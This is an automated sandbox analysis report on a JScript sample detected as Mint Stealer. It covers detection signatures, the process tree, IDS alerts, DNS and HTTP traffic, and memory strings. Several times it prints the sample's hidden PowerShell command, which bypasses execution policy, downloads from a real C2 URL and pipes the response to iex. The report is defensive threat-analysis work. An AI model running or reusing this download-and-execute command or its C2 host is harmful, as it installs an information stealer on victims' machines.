
Windows Analysis Report
FM5vWQHpqe.js

Overview

General Information

Sample name: FM5vWQHpqe.js (renamed because original name is a hash value)
Original sample name: 24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1.js
Analysis ID: 1595057
MD5: c1c0e16fc76c9da7873958c89c59416d
SHA1: c66661696fa8bdc6576c4b47a106a0c32518b2b9
SHA256: 24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1
Tags: jsnzy3tvbb72g3-topSpam-ITAuser-JAMESWT_MHT

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries Google from non browser process on port 80
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 7456 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
{"C2 url": "http://nzy3tvbb72g3.top/1.php?s=mints13"}
Source | Rule | Description | Author | Strings
00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
amsi64_7456.amsi.csv | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ProcessId: 7456, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ProcessId: 7456, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7456, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex", ProcessId: 7580, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-20T11:55:51.369979+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:51.369979+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:51.369979+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49705 | 206.188.196.219 | 80 | TCP
2025-01-20T11:55:52.016079+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49706 | 142.250.185.68 | 80 | TCP


AV Detection

Source: http://nzy3tvbb72g3.top/1.php?s=mints13 | Avira URL Cloud: Label: malware
Source: http://nzy3tvbb72g3.top | Avira URL Cloud: Label: malware
Source: amsi64_7456.amsi.csv | Malware Configuration Extractor: MintStealer {"C2 url": "http://nzy3tvbb72g3.top/1.php?s=mints13"}
Source: FM5vWQHpqe.js | Virustotal: Detection: 19%
Source: Binary string: n.pdb? | source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbstem32\Drivers\DriverDataNUMBER_OF_PROCESSORS=2OS=Windows_NTPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64ProgramData=C:\ProgramDataPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoota | source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb | source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbourcG | source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb | source: powershell.exe, 00000002.00000002.1570309617.0000027957BB7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbat | source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: icrosoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000002.00000002.1569227038.00000279578A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000002.00000002.1549666918.000002793D922000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: soft.PowerShell.Commands.Utility.pdb34e089 | source: powershell.exe, 00000002.00000002.1569227038.00000279578DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbu | source: powershell.exe, 00000002.00000002.1569227038.000002795795E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Software Vulnerabilities

Source: FM5vWQHpqe.js | Return value: ['"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']
Source: FM5vWQHpqe.js | Argument value: ['"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']
Source: FM5vWQHpqe.js | Return value: ['"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']
Source: FM5vWQHpqe.js | Return value: ['"Wscript.Shell"', '"Scripting.FileSystemObject"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl URL |iex""', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.8:49705 -> 206.188.196.219:80
Source: Network traffic | Suricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.8:49705 -> 206.188.196.219:80
Source: Malware configuration extractor | URLs: http://nzy3tvbb72g3.top/1.php?s=mints13
Source: FM5vWQHpqe.js | Return value: ['"http://nzy3tvbb72g3.top/1.php?s=mints13"', '"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top']
Source: FM5vWQHpqe.js | Return value: ['"http://nzy3tvbb72g3.top/1.php?s=mints13"']
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 206.188.196.219
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49706 -> 142.250.185.68:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49705 -> 206.188.196.219:80
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: nzy3tvbb72g3.top Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: nzy3tvbb72g3.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1550248650.000002793FAC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940BD7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nzy3tvbb72g3.top
Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nzy3tvbb72g3.top/1.php?s=mints13
Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002794079C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.00000279407AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000002.00000002.1550248650.000002793F8A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1550248650.0000027940E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000002.00000002.1550248650.00000279410E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000002.00000002.1550248650.000002793FC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794FB9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.000002793FC5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000002.00000002.1550248650.0000027941258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000002.00000002.1550248650.000002793FCCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000002.00000002.1550248650.0000027940B5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-2x.pn
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1565751136.000002794F912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1550248650.0000027940ED7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000002.00000002.1550248650.000002793FDB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000002.00000002.1550248650.00000279402E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?tab=w1

              System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
Source: FM5vWQHpqe.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrlqki3w.wdu.ps1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FM5vWQHpqe.js Virustotal: Detection: 19%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FM5vWQHpqe.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"
